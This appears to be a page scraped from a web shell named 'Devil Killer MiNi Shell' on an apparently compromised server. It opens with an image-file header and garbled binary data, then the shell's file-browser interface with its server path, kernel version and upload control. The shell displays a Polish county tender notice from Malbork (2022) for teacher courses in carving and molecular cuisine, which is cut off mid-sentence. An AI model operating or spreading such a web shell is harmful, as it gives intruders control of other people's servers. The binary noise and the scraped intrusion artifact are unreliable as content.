JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220610/0020329201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa przygotowania i przeprowadzenia kursów dla nauczycieli z Zespołu Szkół Ponadgimnazjalnych nr 4 w Malborku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT MALBORSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 192644731</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Słowiański 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Malbork</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">556460447</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">p.szarmach@powiat.malbork.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.powiat.malbork.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa przygotowania i przeprowadzenia kursów dla nauczycieli z Zespołu Szkół Ponadgimnazjalnych nr 4 w Malborku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-87f5226e-e88b-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00203292</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00010788/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.31 Kurs Carvingu w ramach projektu ZOSTAŃ ZAWODOWCEM</p> <p class="mb-0">1.3.32 Kurs kuchni molekularnej w ramach projektu ZOSTAŃ ZAWODOWCEM</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiat-malbork.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://powiat-malbork.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W <br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa <br/>się przy użyciu platformy zakupowej https://powiat-malbork.ezamawiajacy.pl.<br/>2. Oferty, oświadczenia, sporządza się pod rygorem nieważności, w postaci elektronicznej i opatruje się <br/>jednym z poniższych sposobów:- kwalifikowanym podpisem elektronicznym,- podpisem zaufanym,- <br/>elektronicznym podpisem osobistym.<br/>3. Sposób sporządzenia oraz sposób przekazywania ofert, oświadczeń, o których mowa w art. 125 ust. <br/>1 ustawy Pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych, oraz <br/>innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu o udzielenie <br/>zamówienia, wymagania techniczne dla dokumentów elektronicznych, wymagania techniczne i <br/>organizacyjne użycia środków komunikacji elektronicznej służące do odbioru dokumentów <br/>elektronicznych, jak również sposób ich sporządzenia określa rozporządzenie Prezesa Rady Ministrów <br/>z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań <br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w <br/>postępowaniu o udzielenie zamówienia (Dz.U. z 2020 r. poz. 2452).<br/>4. Ofertę i oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, składa się pod rygorem <br/>nieważności, w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub <br/>podpisem osobistym zgodnie z art. 63 ust. 2 ustawy Pzp.<br/>5. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi <br/>posiadać konto na platformie zakupowej https://powiat-malbork.ezamawiajacy.pl W zakładce Regulacje <br/>i procedury procesu zakupowego znajduje się szczegółowa instrukcja odnoście założenia konta przez <br/>Wykonawcę (Instrukcja_OnePlace_Wykonawca).<br/>6. Ogólne zasady korzystania z Platformy, z zastrzeżeniem pkt 7 niniejszego Rozdziału;<br/>1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Powiatu <br/>Malborskiego: https://powiatmalbork.ezamawiajacy.pl lub https://oneplace.marketplanet.pl.<br/>2) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony <br/>https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do <br/>założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; <br/>podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje <br/>regulamin, klika polecenie „zarejestruj się”.<br/>3) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający <br/>zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w <br/>postaci elektronicznej.<br/>4) Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o <br/>możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem <br/>telefonu podanym w ww. potwierdzeniu. 5) Po założeniu konta Wykonawca ma możliwość złożenia <br/>Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności <br/>zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy <br/>Zakupowej w zakładce &#34;Pytania i odpowiedzi&#34;. Za datę przekazania zawiadomień oraz informacji <br/>przyjmuje się ich datę wczytania do Systemu.7. Wymagania techniczne i organizacyjne wysyłania i <br/>odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz <br/>informacji przekazywanych przy ich użyciu opisane zostały w dokumencie Intrukcja_Wykonawca <br/>dostępnym w zakładce Regulacje i procedury procesu zakupowego. Szczegółowe wymagania <br/>techniczne i organizacyjne dotyczące korespondencji elektronicznej zawarte są w SWZ, w <br/>szczególności w Rozdziale 8 SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://powiat-malbork.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna (Informacje podawane w przypadku <br/>zbierania danych osobowych od osoby, której dane dotyczą) zawarte są w Rozdziale 24 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna (Informacje podawane w przypadku <br/>zbierania danych osobowych od osoby, której dane dotyczą) zawarte są w Rozdziale 24 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZZP.272.36.2022.PSH</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 9907,40 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> KURS CARVINGU </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 3703,70 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-05 do 2023-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie trenera w przeprowadzeniu kursów o tematyce dotyczącym carvingu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kurs kuchnia molekularna </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 6203,70 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-05 do 2023-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie trenera w przeprowadzeniu kursów o tematyce dotyczącym kuchni molekularnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta zastała najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych <br/>środków dowodowych aktualnych na dzień ich złożenia:<br/>2) w odniesieniu do braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu<br/>a) odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o <br/>Działalności Gospodarczej, w zakresie określonym w art. 109 ust. 1 pkt 4) ustawy Pzp, sporządzonego <br/>nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru <br/>lub ewidencji;<br/>(Zamawiający odstąpi od wezwania w sytuacji, gdy Wykonawca zaznaczy w Oświadczeniu o braku <br/>podstaw do wykluczenia, iż pozwala samodzielnie pobrać wymagany dokument Zamawiającemu). <br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/>− dokumenty, o których mowa w pkt 2) składa każdy z Wykonawców.<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, <br/>zamiast odpisu lub informacji, o których mowa powyżej - składa dokument lub dokumenty, wystawione <br/>w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że <br/>nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie <br/>zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się <br/>on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca <br/>wszczęcia tej procedury.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty, które Wykonawca ubiegający się o zamówienie publiczne zobowiązany jest złożyć: <br/>1) Wypełniony Formularz Ofertowy (załącznik nr 1 do SWZ).<br/>2) Oświadczenie o niepodleganiu wykluczeniu w postępowaniu, składane na podstawie art. 125 <br/>ust. 1 ustawy Pzp (załącznik nr 2 do SWZ)<br/>Oświadczenie składają odrębnie: <br/>- Wykonawca,<br/>- każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli <br/>dotyczy).<br/>3) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na <br/>podstawie art. 117 ust. 4 ustawy Pzp – jeśli dotyczy (wzór - załącznik nr 3 do SWZ).<br/>4) Dowody, o których mowa w art. 110 ust. 2 ustawy Pzp, na to, że mimo zaistnienia podstaw <br/>wykluczenia wymienionych w art. 108 ust. 1 pkt 1), 2) i 5) lub art. 109 ust. 1 pkt 4) ustawy Pzp, <br/>podjęte przez Wykonawcę środki są wystarczające do wykazania jego rzetelności – jeśli <br/>dotyczy. 5) Pełnomocnictwo<br/>- w przypadku składania oferty wspólnej - pełnomocnictwo podmiotów występujących wspólnie, <br/>- pełnomocnictwo do podpisania oferty, względnie do podpisania innych dokumentów <br/>składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów <br/>złożonych wraz z ofertą,<br/>- Pełnomocnictwa, określające rodzaj i zakres czynności, które może realizować pełnomocnik <br/>muszą być w oryginale w postaci elektronicznej opatrzonej kwalifikowanym podpisem <br/>elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym osoby/osób <br/>udzielającej/cych pełnomocnictwa, bądź kopii notarialnej, potwierdzonej za zgodność<br/>z oryginałem notarialnie w postaci elektronicznej opatrzonej kwalifikowanym podpisem <br/>elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym notariusza. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego.<br/>2. Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w <br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia <br/>umowy.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców dokumenty, o <br/>których mowa w Rozdziale 6 Etap 1 i 2 pkt 2) niniejszej SWZ, składa każdy z Wykonawców <br/>wspólnie ubiegających się o zamówienie. Dokumenty, te potwierdzają brak podstaw wykluczenia <br/>oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy<br/>z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. Wykonawcy wspólnie ubiegających się o udzielenie zamówienia składają wraz z ofertą <br/>oświadczenie z którego wynika, które usługi wykonują poszczególni Wykonawcy – wzór <br/>oświadczenia stanowi załącznik nr 3 do SWZ.<br/>5. Wykonawcy występujący wspólnie muszą, zgodnie z zapisami art. 58 ust. 2 ustawy Pzp <br/>ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie <br/>niniejszego zamówienia albo do reprezentowania ich w postępowaniu i zawarciu umowy w <br/>sprawie przedmiotowego zamówienia publicznego. Do oferty należy dołączyć pełnomocnictwo, <br/>które powinno dokładnie określać zakres umocowania.<br/>6. Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego <br/>Zamawiający kieruje informacje, korespondencję, itp.<br/>7. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub <br/>zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2) ustawy Pzp, <br/>zostanie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegający się o udzielenie <br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub <br/>zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te <br/>uprawnienia są wymagane.<br/>8. Oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać <br/>następujące wymagania:<br/>1) oferta wspólna powinna być sporządzona zgodnie z SWZ;<br/>2) sposób składania dokumentów w ofercie wspólnej:<br/>- dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw do <br/>wykluczenia składa każdy z Wykonawców składających ofertę wspólną we własnym imieniu; <br/>- dokumenty wspólne takie jak np.: formularz ofertowy, dokumenty podmiotowe i przedmiotowe <br/>składa pełnomocnik Wykonawców w imieniu wszystkich Wykonawców składających ofertę <br/>wspólną;<br/>3) kopie dokumentów dotyczących każdego z Wykonawców składających ofertę wspólną muszą 